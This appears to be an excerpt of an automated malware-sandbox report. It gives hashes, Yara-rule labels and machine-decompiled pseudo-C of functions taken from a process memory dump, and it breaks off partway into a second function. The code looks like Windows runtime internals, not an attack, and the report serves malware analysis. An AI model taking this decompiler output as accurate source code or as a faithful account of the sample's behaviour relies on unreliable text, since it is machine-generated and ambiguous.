                                                                                                                                                    • Instruction ID: 3b7aaf529e992b76eedeef5f6a24a87137a648681a86adcfa3f8d27c735985e8
                                                                                                                                                    • Opcode Fuzzy Hash: 4bf191b295abb88b7bdc3da7d10b201e93fb507bad2821b133cf98bf77737bd2
                                                                                                                                                    • Instruction Fuzzy Hash: 24F17B756093118FC764CF2AC480A3AB7E1FF88704F59496EF896CB290E734D991CB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E030F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x31b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E030F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E030F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E030C58EC(_t240);
									_t221 =  *0x31b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x31b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03104A2C(0x31b6e40, 0x3104b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E030E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x30a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E030FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E030FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03147016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L030E2400(_t267 + 0x20);
															}
															L030E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E030F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E030E2280(_t134, 0x31b8608);
									__eflags =  *0x31b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E030DFFB0(_t198, _t241, 0x31b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x31b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x31b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E030F6B90(_t210,  &_v64);
										_t262 =  *0x31b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E030FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E031097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0310006A(0x31b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x31b8608);
												E0310B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x31b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x31b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E030DFFB0(_t198, _t240, 0x31b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E031000C2(0x31b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                                                                    0x030f20a0
                                                                                                                                                    0x030f20a8
                                                                                                                                                    0x030f20ad
                                                                                                                                                    0x030f20b3
                                                                                                                                                    0x030f20b8
                                                                                                                                                    0x030f20c2
                                                                                                                                                    0x030f20c7
                                                                                                                                                    0x030f20cb
                                                                                                                                                    0x030f20d2
                                                                                                                                                    0x030f2263
                                                                                                                                                    0x030f2266
                                                                                                                                                    0x03135836
                                                                                                                                                    0x03135836
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f226c
                                                                                                                                                    0x030f226c
                                                                                                                                                    0x030f2270
                                                                                                                                                    0x030f2274
                                                                                                                                                    0x030f20e2
                                                                                                                                                    0x030f20e2
                                                                                                                                                    0x030f20e6
                                                                                                                                                    0x030f20ee
                                                                                                                                                    0x031357dc
                                                                                                                                                    0x031357de
                                                                                                                                                    0x031357ec
                                                                                                                                                    0x031357ec
                                                                                                                                                    0x031357f1
                                                                                                                                                    0x031357f3
                                                                                                                                                    0x031357f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031357f8
                                                                                                                                                    0x031357e0
                                                                                                                                                    0x031357e4
                                                                                                                                                    0x031357ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031357ea
                                                                                                                                                    0x030f20f4
                                                                                                                                                    0x030f20f4
                                                                                                                                                    0x030f20f8
                                                                                                                                                    0x030f20f8
                                                                                                                                                    0x030f20fc
                                                                                                                                                    0x030f2100
                                                                                                                                                    0x030f2106
                                                                                                                                                    0x030f2201
                                                                                                                                                    0x030f2206
                                                                                                                                                    0x030f220b
                                                                                                                                                    0x030f220e
                                                                                                                                                    0x030f22a9
                                                                                                                                                    0x030f22ac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f22b2
                                                                                                                                                    0x030f22b5
                                                                                                                                                    0x03135801
                                                                                                                                                    0x03135806
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135810
                                                                                                                                                    0x03135815
                                                                                                                                                    0x03135818
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313581e
                                                                                                                                                    0x030f22bb
                                                                                                                                                    0x030f22bb
                                                                                                                                                    0x030f2218
                                                                                                                                                    0x030f2218
                                                                                                                                                    0x030f221c
                                                                                                                                                    0x030f2220
                                                                                                                                                    0x030f2222
                                                                                                                                                    0x030f22c2
                                                                                                                                                    0x030f22c4
                                                                                                                                                    0x030f22dc
                                                                                                                                                    0x030f22dc
                                                                                                                                                    0x030f22e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f22e7
                                                                                                                                                    0x030f22c8
                                                                                                                                                    0x030f22cd
                                                                                                                                                    0x030f22d3
                                                                                                                                                    0x030f22d6
                                                                                                                                                    0x03135823
                                                                                                                                                    0x03135825
                                                                                                                                                    0x03135827
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313582d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313582d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2228
                                                                                                                                                    0x030f2228
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2228
                                                                                                                                                    0x030f2222
                                                                                                                                                    0x030f2214
                                                                                                                                                    0x030f2214
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2114
                                                                                                                                                    0x030f2114
                                                                                                                                                    0x030f2114
                                                                                                                                                    0x030f211a
                                                                                                                                                    0x030f211c
                                                                                                                                                    0x030f2348
                                                                                                                                                    0x030f234d
                                                                                                                                                    0x03135840
                                                                                                                                                    0x03135845
                                                                                                                                                    0x03135848
                                                                                                                                                    0x0313584e
                                                                                                                                                    0x0313584e
                                                                                                                                                    0x03135848
                                                                                                                                                    0x030f2353
                                                                                                                                                    0x030f2355
                                                                                                                                                    0x030f2388
                                                                                                                                                    0x030f2388
                                                                                                                                                    0x030f2368
                                                                                                                                                    0x030f236a
                                                                                                                                                    0x030f236c
                                                                                                                                                    0x030f238f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f236e
                                                                                                                                                    0x030f236e
                                                                                                                                                    0x030f218e
                                                                                                                                                    0x030f218e
                                                                                                                                                    0x030f2191
                                                                                                                                                    0x030f2195
                                                                                                                                                    0x03135a03
                                                                                                                                                    0x03135a06
                                                                                                                                                    0x03135a0c
                                                                                                                                                    0x03135a0f
                                                                                                                                                    0x03135a11
                                                                                                                                                    0x03135a13
                                                                                                                                                    0x03135a13
                                                                                                                                                    0x03135a19
                                                                                                                                                    0x03135a1f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f219b
                                                                                                                                                    0x030f219b
                                                                                                                                                    0x030f21a0
                                                                                                                                                    0x030f2282
                                                                                                                                                    0x030f2284
                                                                                                                                                    0x030f2284
                                                                                                                                                    0x030f2284
                                                                                                                                                    0x030f2284
                                                                                                                                                    0x030f21a6
                                                                                                                                                    0x030f21a9
                                                                                                                                                    0x030f21ac
                                                                                                                                                    0x030f21ae
                                                                                                                                                    0x030f21b3
                                                                                                                                                    0x030f228b
                                                                                                                                                    0x030f2290
                                                                                                                                                    0x030f2379
                                                                                                                                                    0x030f2296
                                                                                                                                                    0x030f2298
                                                                                                                                                    0x030f2298
                                                                                                                                                    0x030f2290
                                                                                                                                                    0x030f21b9
                                                                                                                                                    0x030f21be
                                                                                                                                                    0x030f22a2
                                                                                                                                                    0x030f22a2
                                                                                                                                                    0x030f21c4
                                                                                                                                                    0x030f21c8
                                                                                                                                                    0x030f21cc
                                                                                                                                                    0x030f21d0
                                                                                                                                                    0x030f21d4
                                                                                                                                                    0x030f21de
                                                                                                                                                    0x030f21e3
                                                                                                                                                    0x03135a29
                                                                                                                                                    0x03135a2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135a3b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f21e9
                                                                                                                                                    0x030f21e9
                                                                                                                                                    0x030f21e9
                                                                                                                                                    0x030f21ee
                                                                                                                                                    0x030f21f1
                                                                                                                                                    0x03135a45
                                                                                                                                                    0x03135a4b
                                                                                                                                                    0x03135a52
                                                                                                                                                    0x03135a58
                                                                                                                                                    0x03135a5d
                                                                                                                                                    0x03135a5f
                                                                                                                                                    0x03135a71
                                                                                                                                                    0x03135a61
                                                                                                                                                    0x03135a6a
                                                                                                                                                    0x03135a6a
                                                                                                                                                    0x03135a76
                                                                                                                                                    0x03135a79
                                                                                                                                                    0x03135a7f
                                                                                                                                                    0x03135a83
                                                                                                                                                    0x03135a85
                                                                                                                                                    0x03135a87
                                                                                                                                                    0x03135a87
                                                                                                                                                    0x03135a8c
                                                                                                                                                    0x03135a91
                                                                                                                                                    0x03135a97
                                                                                                                                                    0x03135a9f
                                                                                                                                                    0x03135aa0
                                                                                                                                                    0x03135aa1
                                                                                                                                                    0x03135aa6
                                                                                                                                                    0x03135aab
                                                                                                                                                    0x03135ab1
                                                                                                                                                    0x03135ab3
                                                                                                                                                    0x03135ab9
                                                                                                                                                    0x03135aca
                                                                                                                                                    0x03135ad4
                                                                                                                                                    0x03135ad4
                                                                                                                                                    0x03135ade
                                                                                                                                                    0x03135ade
                                                                                                                                                    0x03135aab
                                                                                                                                                    0x03135a79
                                                                                                                                                    0x03135a52
                                                                                                                                                    0x030f21f7
                                                                                                                                                    0x030f21f9
                                                                                                                                                    0x030f21fe
                                                                                                                                                    0x030f21fe
                                                                                                                                                    0x030f21e3
                                                                                                                                                    0x030f2195
                                                                                                                                                    0x030f236c
                                                                                                                                                    0x030f2122
                                                                                                                                                    0x030f2122
                                                                                                                                                    0x030f2124
                                                                                                                                                    0x030f2231
                                                                                                                                                    0x030f2236
                                                                                                                                                    0x030f2236
                                                                                                                                                    0x030f2238
                                                                                                                                                    0x030f2238
                                                                                                                                                    0x030f2240
                                                                                                                                                    0x030f2242
                                                                                                                                                    0x030f2244
                                                                                                                                                    0x031359fc
                                                                                                                                                    0x030f218c
                                                                                                                                                    0x030f218c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f218c
                                                                                                                                                    0x030f224a
                                                                                                                                                    0x030f224f
                                                                                                                                                    0x030f2256
                                                                                                                                                    0x030f2304
                                                                                                                                                    0x030f2309
                                                                                                                                                    0x030f230f
                                                                                                                                                    0x030f231e
                                                                                                                                                    0x030f231e
                                                                                                                                                    0x030f231e
                                                                                                                                                    0x030f2320
                                                                                                                                                    0x030f2325
                                                                                                                                                    0x030f232a
                                                                                                                                                    0x030f232c
                                                                                                                                                    0x030f233e
                                                                                                                                                    0x030f233e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f232c
                                                                                                                                                    0x030f2311
                                                                                                                                                    0x030f2317
                                                                                                                                                    0x030f231a
                                                                                                                                                    0x030f231c
                                                                                                                                                    0x030f2380
                                                                                                                                                    0x030f2380
                                                                                                                                                    0x030f2380
                                                                                                                                                    0x030f2384
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2386
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f231c
                                                                                                                                                    0x030f225c
                                                                                                                                                    0x030f225c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f225c
                                                                                                                                                    0x030f212a
                                                                                                                                                    0x030f2134
                                                                                                                                                    0x030f2138
                                                                                                                                                    0x030f213d
                                                                                                                                                    0x03135858
                                                                                                                                                    0x03135863
                                                                                                                                                    0x03135863
                                                                                                                                                    0x03135867
                                                                                                                                                    0x0313586a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313586c
                                                                                                                                                    0x0313586c
                                                                                                                                                    0x03135871
                                                                                                                                                    0x03135875
                                                                                                                                                    0x03135877
                                                                                                                                                    0x03135997
                                                                                                                                                    0x0313599c
                                                                                                                                                    0x031359a1
                                                                                                                                                    0x031359a7
                                                                                                                                                    0x031359a7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031359a7
                                                                                                                                                    0x0313587d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313588b
                                                                                                                                                    0x0313588b
                                                                                                                                                    0x03135890
                                                                                                                                                    0x03135892
                                                                                                                                                    0x03135894
                                                                                                                                                    0x03135899
                                                                                                                                                    0x0313589b
                                                                                                                                                    0x031358a0
                                                                                                                                                    0x031358a0
                                                                                                                                                    0x031358aa
                                                                                                                                                    0x031358b2
                                                                                                                                                    0x031358b6
                                                                                                                                                    0x031358be
                                                                                                                                                    0x031358c6
                                                                                                                                                    0x031358c9
                                                                                                                                                    0x0313590d
                                                                                                                                                    0x03135917
                                                                                                                                                    0x0313591a
                                                                                                                                                    0x0313591c
                                                                                                                                                    0x03135920
                                                                                                                                                    0x03135928
                                                                                                                                                    0x0313592a
                                                                                                                                                    0x0313592c
                                                                                                                                                    0x0313592e
                                                                                                                                                    0x0313592e
                                                                                                                                                    0x031358cb
                                                                                                                                                    0x031358cd
                                                                                                                                                    0x031358d8
                                                                                                                                                    0x031358e0
                                                                                                                                                    0x031358f4
                                                                                                                                                    0x031358fe
                                                                                                                                                    0x031358fe
                                                                                                                                                    0x0313593a
                                                                                                                                                    0x0313593e
                                                                                                                                                    0x03135940
                                                                                                                                                    0x03135942
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135944
                                                                                                                                                    0x03135944
                                                                                                                                                    0x03135949
                                                                                                                                                    0x0313594e
                                                                                                                                                    0x0313594e
                                                                                                                                                    0x03135953
                                                                                                                                                    0x0313595b
                                                                                                                                                    0x03135976
                                                                                                                                                    0x03135976
                                                                                                                                                    0x0313597a
                                                                                                                                                    0x0313597f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135981
                                                                                                                                                    0x03135981
                                                                                                                                                    0x03135981
                                                                                                                                                    0x03135983
                                                                                                                                                    0x03135988
                                                                                                                                                    0x0313598d
                                                                                                                                                    0x03135991
                                                                                                                                                    0x03135991
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313595d
                                                                                                                                                    0x0313595d
                                                                                                                                                    0x03135963
                                                                                                                                                    0x03135965
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135967
                                                                                                                                                    0x03135967
                                                                                                                                                    0x0313596b
                                                                                                                                                    0x0313596d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313596f
                                                                                                                                                    0x03135971
                                                                                                                                                    0x03135971
                                                                                                                                                    0x03135974
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135974
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135967
                                                                                                                                                    0x0313595b
                                                                                                                                                    0x03135942
                                                                                                                                                    0x03135863
                                                                                                                                                    0x030f2143
                                                                                                                                                    0x030f2143
                                                                                                                                                    0x030f2149
                                                                                                                                                    0x030f214f
                                                                                                                                                    0x030f22f1
                                                                                                                                                    0x030f22f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2173
                                                                                                                                                    0x030f2173
                                                                                                                                                    0x030f217d
                                                                                                                                                    0x030f2181
                                                                                                                                                    0x030f2186
                                                                                                                                                    0x031359ae
                                                                                                                                                    0x031359b2
                                                                                                                                                    0x031359b5
                                                                                                                                                    0x031359b7
                                                                                                                                                    0x031359ba
                                                                                                                                                    0x031359cd
                                                                                                                                                    0x031359d1
                                                                                                                                                    0x031359d5
                                                                                                                                                    0x031359d9
                                                                                                                                                    0x031359db
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031359dd
                                                                                                                                                    0x031359dd
                                                                                                                                                    0x031359e1
                                                                                                                                                    0x031359e4
                                                                                                                                                    0x031359e7
                                                                                                                                                    0x031359ee
                                                                                                                                                    0x031359ee
                                                                                                                                                    0x031359f3
                                                                                                                                                    0x031359f3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2186
                                                                                                                                                    0x030f214f
                                                                                                                                                    0x030f2106
                                                                                                                                                    0x030f2266
                                                                                                                                                    0x030f20d8
                                                                                                                                                    0x030f20da
                                                                                                                                                    0x030f20e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 181c1762cf82c86a3747b062fdbeba55e3d2608e0923e702c5ff9fd9912b7e69
                                                                                                                                                    • Instruction ID: 85145b0e1c707e6dc1a2dbcca178c4e7b391535dc7c8f58a14431447b5590188
                                                                                                                                                    • Opcode Fuzzy Hash: 181c1762cf82c86a3747b062fdbeba55e3d2608e0923e702c5ff9fd9912b7e69
                                                                                                                                                    • Instruction Fuzzy Hash: 35F1463960A3459FD765CF28C84076EB7EABFCA710F088D5DEA959B680D734D841CB82
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030DD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E030DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
